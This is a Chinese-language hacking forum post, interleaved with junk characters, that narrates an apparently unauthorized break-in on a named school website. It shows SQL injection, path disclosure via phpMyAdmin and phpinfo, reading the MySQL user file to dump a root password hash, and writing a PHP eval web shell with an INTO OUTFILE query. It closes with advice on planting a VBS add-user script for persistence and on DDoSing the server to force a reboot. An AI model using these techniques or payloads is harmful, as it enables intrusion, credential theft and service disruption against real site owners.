第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏: b# d) O4 P' h$ D
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!# k) n) _, r6 s9 o [+ a
: |+ K2 M) i2 i J
6 X- r( y7 Y. y9 u/ _: y; m" x) l1 H8 m
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 , K2 ]5 r# z8 i- E: \9 V7 Q' u* V
9 C; Y( H d* P/ t5 [那么想可以直接写入shell ,getshell有几个条件:
" {7 J+ P' p0 y1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF 4 o# v. X) t4 j: Y# Z! S
% j" L K0 K4 \( V% B" U试着爆绝对路径:
) w2 Z6 V* p* `1./phpMyAdmin/index.php?lang[]=1
w5 X9 J- O3 E- ?5 `2./phpMyAdmin/phpinfo.php
7 y/ k! y3 k) y& Z+ A! P4 @3./load_file() & X8 G v/ _7 L1 D/ z; i
4./phpmyadmin/themes/darkblue_orange/layout.inc.php ) L! O0 I9 A. H1 Y) T, ?0 Q
5./phpmyadmin/libraries/select_lang.lib.php ' f' G9 T5 _" s# f: `1 A& d
6./phpmyadmin/libraries/lect_lang.lib.php # z# G8 G( i1 ~! k6 u( P! r
7./phpmyadmin/libraries/mcrypt.lib.php : u/ K+ _7 L' Y4 _
8./phpmyadmin/libraries/export/xls.php . j2 a1 t+ S1 s! _; a# G1 U1 _
- \' a) L8 v8 V5 O2 k0 c N8 z
均不行........................... % n% B! C0 }0 Z$ S3 E' p, Q4 y% s) l
1 J7 o) i: S* e( v& ^
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php + @* B0 q# [8 t! a5 N
/ G1 }9 W8 J: r( J0 ^8 X: T$ X
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
* N# r6 H% M4 Y5 G5 z! @8 J, u+ p2 @% V' N9 ?7 B
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
) o$ p: W2 a3 u: x5 i" C" b% S$ `) T9 Y% m
敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
2 @( @- s, E( D
# i- b. j6 w# B想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
6 I5 e# L1 h |9 ^. @& H
4 f& U! I* z' d7 @http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini $ v2 m& C! I1 m8 U( ~; D
% G, ^4 o7 a$ K0 a自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD ' N* z+ @# X! W, E) U- r
5 U# y8 A, N/ l" L' f
成功读到root密码: # \% r. n% I0 o) C- G5 X# f4 X
' d8 f! g" a3 M* h" l5 H17---- r(0072) . l8 w- q+ E6 }" V+ s1 t( r* K
18---- o(006f)
4 ]. A5 B( N! r% R19---- o(006f) 6 m& Z: Z* \. X- P4 q
20---- t(0074)
/ Q8 W- t9 i& ~. L$ I21---- *(002a) } r# X0 h1 w o
22---- 8(0038)
" [" ]/ C4 [" L% D23---- 2(0032) 6 |) M7 F8 f6 `* q
24---- E(0045)
( m# y$ A& c$ |+ J# u2 T5 A25---- 1(0031) * {9 \* {. U, R
26---- C(0043)
/ U) z) n# y9 K! O: f0 n X! c9 a+ {27---- 5(0035)
! |. \5 C& o2 j$ M* z: R28---- 8(0038)
; c" I% {+ p. l+ I) J29---- 2(0032) ; [* s5 ], Y" D+ C' Y) Y ]% ^
30---- 8(0038)
; B& r8 d/ u' l- q8 W6 V2 O31---- A(0041) 6 t9 V0 k* J5 f8 Z. b
32---- 9(0039) 4 r2 ~3 r/ l5 I& O; C' Y/ [
33---- B(0042) 5 F I. X5 i/ c' b# i
34---- 5(0035) 5 T* K p2 \3 ?/ e; m% ~
35---- 4(0034) ; X, _/ e! r2 V1 n8 B1 o0 F* ~) Z
36---- 8(0038)
1 c4 A+ `9 h7 b; y37---- 6(0036)
7 ?8 ^- i: b! H38---- 4(0034) ' ]2 l# o& i( q+ r9 \6 M, j& {& T
39---- 9(0039) ' M, _* q4 x5 x* W6 ?
40---- 1(0031) " `+ M- G7 n; [& Z5 {' ~% ~
41---- 1(0031)
( U) ^! X/ F) j7 {; N, N5 H" R3 B4 ]42---- 5(0035)
+ {$ O9 H) d6 Z* K [43---- 3(0033) % v% L; l% u. f0 A+ F3 x- g
44---- 5(0035) - D/ ]% h1 D L2 F' m% ~
45---- 9(0039)
3 y# ?8 [! T' t ^% j& K46---- 8(0038)
0 s8 p) o, y% A. H7 K+ _/ L1 s! A47---- F(0046) 1 _* |2 B. s3 t9 u( `1 l
48---- F(0046)
& W( M' f& H2 O" [) R49---- 4(0034) + C0 f ?6 \" j) \
50---- F(0046) " Z( |! S3 \ U
51---- 0(0030) 8 g8 i/ T% e, }1 b& t5 K3 n
52---- 3(0033)
6 O A2 z) \. d5 p53---- 2(0032)
' S8 Y# z2 d' l* R8 G54---- A(0041) . ?1 S, \ Z* U' c, M
55---- 4(0034)
2 E; \1 h5 V2 ^% J) _ C- }56---- A(0041) ) J3 I! x+ {6 E" n
57---- B(0042) % `5 k: S9 k( \* S+ y' W! P3 S
58---- *(0044) : F0 s6 j3 s g9 @( n: o) a8 U- B
59---- *(0035) 4 y, t; n- C) e V/ u
60---- *(0041)
' I9 j3 x0 X/ w1 N3 i+ e61---- *0032)
2 ^) J9 t2 b: h# g& q1 u/ f) I) V) w5 E8 w, J% i+ `4 \
解密后成功登陆phpmyamin
T: n" J. g! o) C/ C6 b% b " C4 O2 v' h- s2 ]" j7 r
9 U: G9 C: G# s! {3 y( R
# n4 E+ u) G3 n- [9 k' h2 f$ b4 Y" x: ?5 P6 A! m" W
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
5 P: N& |& F9 h9 @1 l
+ \' b* n" R$ \$ ~% W成功执行,拿下shell,菜刀连接: 2 _, l, g& P" e6 W6 T
4 D7 k, Q, M8 a; Y2 ^; B+ ]& [服务器不支持asp,aspx,php提权无果................... % p' p$ U& |# [7 u D% [* u
& i' {2 y, R1 G! H5 c' I
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: # } S+ ^! ~! A, G! \2 _0 {
服务器上已经有个隐藏帐号了 $ A. M" V( L( S
别名 administrators& l8 s% p8 N, o. J" w
注释 管理员对计算机/域有不受限制的完全访问权
9 B6 m- T, l8 ?5 H: ]; S3 Z成员 ( M. g- p0 b- L1 ?5 v0 w
-------------------------------------------------------------------------------/ `: {8 j) W3 _: m
admin+ l, p6 M$ U) Q9 O0 H6 h M
Administrator0 D$ H0 d- k z" r+ V W6 X% |
slipper$
0 ~$ @8 d% _3 [sqluser
* k8 f- E( G2 b. V. y/ I9 z命令成功完成。 l- q. V& s6 x7 z- c
6 t& C% T2 ^! l- H, \7 |服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。2 e' X- R/ S/ s) p5 c7 S& @
3 N. D. \% b5 }% B) R
ddos服务器重启,不然就只能坐等服务器重启了...............................
' C* g9 @# P d( s5 y ^
. x2 {* }7 o$ r- u ; P" }$ c: ?9 M# R3 o0 b3 x; X
|